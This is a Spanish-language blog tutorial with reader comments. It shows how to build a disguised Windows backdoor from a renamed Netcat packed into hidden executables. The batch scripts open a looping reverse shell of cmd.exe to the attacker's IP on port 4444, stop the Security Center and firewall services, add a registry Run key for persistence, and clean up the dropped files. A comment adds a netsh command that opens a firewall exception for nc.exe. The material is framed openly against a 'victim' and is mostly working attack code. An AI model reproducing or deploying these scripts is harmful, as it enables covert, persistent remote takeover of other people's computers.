Bueno en el ultimo Security Hacking NEA 4, se hablo de Reverse Shell por Dardo Valdez (Yaco), donde mostro como hacer uno con la herraminta Crypcat, aqui les dejo un tutorial muy bueno de WHK. Esta herramienta es una evolucion del Netcat y es exactamente igual los comandos con la diferencia de que la informacion viaja Encriptada. Pero bueno este tutorial que esta hecho por mi trabajo con Netcat.
¿Y en realidad que es Netcat? Netcat es una herramienta muy completa que es indispensable para cualquier administrador de red, el cual nos permite realizar conexiones TCP y UPD. Es tantas las cosas que podemos hacer con ella, que se tambien la denominan "La Navaja Suiza de los Hackers".
Bueno, entonces nosotros vamos a utilizar la opcion de Netcat que nos permita abrir un conexion reversa de la victima con nosotros.
¿Y que es en realidad una Conexion reversa? pss... Bueno eso explicare ahora mas adelante cuando empecemos a realizar el Script.. :)..
Basta y empecemos.
1)
Lo que nesesitamos es:
- Netcat (obviamente.. Busquenlo en San Google para descargarlo)
- QBFC Descarga desde aca
Vamos a trabajar con el QBFC, por algunos motivos, primero los script hechos en batch lo va a pasar a “.exe”, y segundo la mas importate es que nos permite juntar todo nuestros script y darle comandos para que los vaya manejando como queramos. Aqui hay un tuto de el. Aconsejo que lo lean por que voy a obviar su funcionamiento. Y esta muy interesante este programilla.
Ahora empezemos, renombramos el Netcat y le pondremos Win32.exe, abrimos el QBFC y copiamos el siguiente script en el, Ahora antes de guardarlo nos vamos al Icono Options de QBFC luego en la pestaña General marcamos Ghost Aplicattion, que servira para que no muestre ni un solo pestañeo de nada y no haya desconfianza. (Nuevamente recomiendo ver el tutorial de QBFC el cual muestra con imagenes de como utilizarlo.) , ahora lo guardamos con el nombre de “realtek.exe”, para ello nos dirijimos al icono donde dice BUILD.
Netcat > Win32.exe
Scritp_De_abajo > realtek.exe
@echo off
:recursivo
win32.exe -e cmd.exe Tuip 4444
goto recursivo
Bueno entonces que es una Conexion Reversa, pues fijense esta linea "win32.exe -e cmd.exe Tuip 4444", Nosotros que hacemos aca. Primero colocamos el nombre de win32.exe (que es el netcat renombrado por nosotros, para camuflarlo un poco), Ahora aca es la cuestion, le pasamos el comando -e que significa ejecutar, entonces vamos a ejecutar el cmd.exe (la consola de windows) abriendo un tunel hacia nuestra ip en un puerto determinado, que en este caso de ejemplo es el 4444. Este puerto estara escuchando en nuestra maquina a esperca de posibles conexion, cuando la victima ejecute este script pedira conexion hacia nosotros, y como nuestra maquina estara escuchando en ese puerto tendremos el cmd.exe de la victima. Entonces la conexion reversa es que la victima (en este caso) , se conecta a nosotros y no nosotros a ella. ¿Ahora y para que sirve esto.? Y bueno imaginemos que hariamos una conexion directa es decir nosotros pedimos conectarnos a la victima. Empiezan los problemas, ¿cuales? primero que nada tendriamo que concoer su IP. y en el caso de saber que pasaria si tiene ip dinamica.. :(. Ahora tambien podemos pasar por alto algunos firewall no tan complejos, ya que muchos solo no restringen conexiones salientes.
2)
Copiamos el siguiente script, “det.exe”
script_siguiente >det.exe
@echo off
cd
net stop “Centro de Seguridad”
net stop “Firewall de Windows/Conexión compartida a Internet (ICS)”
reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v realtek /t reg_sz /d %systemroot%realtek.exe /f
exit
Este detendra el firewal de windows para que no tengamos problemas, y agregara el proceso realtek.exe al arrancar windows, para que tengamos acceso cada vez que prenda la maquina.
No quise hacerlo mas complejo a la detencion del firewall para hacerlo mas simple. Podran agregarle otras caracteristicas mas eficientes con el comando netsh, recomiendo leer.
3)
Y por ultimo el que manejará la secuencia de las acciones a realizarce. “NCT.exe”( pueden cambiarle el nombre).
@echo off
copy %MYFILES%win32.exe %systemroot%system32
copy %MYFILES%det.exe %systemroot%
copy %MYFILES%realtek.exe %systemroot%
rem borro lo que no utilizaremos mas
del %MYFILES%win32.exe
del %MYFILES%det.exe
del %MYFILES%realtek.exe
rem ejecuto
start %systemroot%det.exe
start %systemroot%realtek.exe
del %systemroot%det.exe
exit
En este ultimo tienen que insertar los distintos archivos que creamos y el netcat osea el “Win32″ 
Y con este terminamos. Cualquier duda las pueden colocar y las respondere con mucho gusto..
Saludos..
MagnoBalt
Que buena info bosco... gracias
ResponderEliminarale...
Que buen blog Fran, mucha suerte, saludos
ResponderEliminaral detener el firewall de windows se desactiva completamente? , o solo lo detiene para ese proceso?
ResponderEliminarHola anonimo, si lo haces de esa manera si detiene el servicio completamente. Para poder agregar una exepcion mediante consola se puede usar el programa netsh, el cual podes ver en enlace http://magnobalt.blogspot.com/2010/03/laboratorio-metasploit-backdor.html.
ResponderEliminarIgualmente te dejo aqui:
>netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe"
Esta linea agrega una expecion en el firewall de windows para la aplicacion nc.exe en el puerto 1234, tanto para UDP como TCP. Espero haberte ayudado.
Saludos